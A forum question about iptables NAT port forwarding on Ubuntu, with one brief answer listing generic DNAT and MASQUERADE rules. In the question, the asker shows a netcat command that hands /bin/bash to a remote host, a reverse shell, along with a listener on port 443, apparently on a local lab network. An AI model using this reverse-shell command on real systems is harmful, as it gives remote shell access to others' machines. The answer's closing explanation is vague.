# How to port forward my ubuntu 22.04 using iptables

Tags: networking, iptables, port-forwarding, nat, netcat

Do you know how to gives iptables rules to my machine in order to allow trafic from my public interfaces(wlp3s0) to my private interfaces(lo). Kinda with this topology: `192.168.1.1:80 => 127.0.0.1:80`

I need to get this because I'm trying to connect my web server with netcat suing the following command: nc 192.168.1.23 80-e /bin/bash -v and it didn't have problem to connect with server, because the computer return me: nc: Connected to 192.168.1.23 80. No problem, but the problem is when I start the listener with nc -lvpn 443. Stays listening and dont connected:

> ```
> Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443
> ```

Now when I check the processes, I realized of this

> TCP gr10-thinkpad-edge-e430:36410->gr21:https

netcat establish tcp conection with the server using my public interfaces, but when I listen only does in the private(127.0.0.1) and not in all interfaces. Therefore netcat isn't able to transfer data from my public interface to my private interface:

> ncat 33827 root 4u IPv4 486476 0t0 TCP *:https (LISTEN)

So my question is: Based on the previous situation, what is the best iptable rules to allow my nat transfer trafic from my public interfaces into my private, of type: `public ip: 80 => private ip:80`? What is the best solution?

Answer (score 1):

```
sysctl net.ipv4.ip_forward=1

iptables -t nat -A PREROUTING -p tcp --dport 22 -j DNAT --to-destination ip1

iptables -t nat -A PREROUTING -j DNAT --to-destination ip2

iptables -t nat -A POSTROUTING -j MASQUERADE
```

all data from ip1 forward to ip2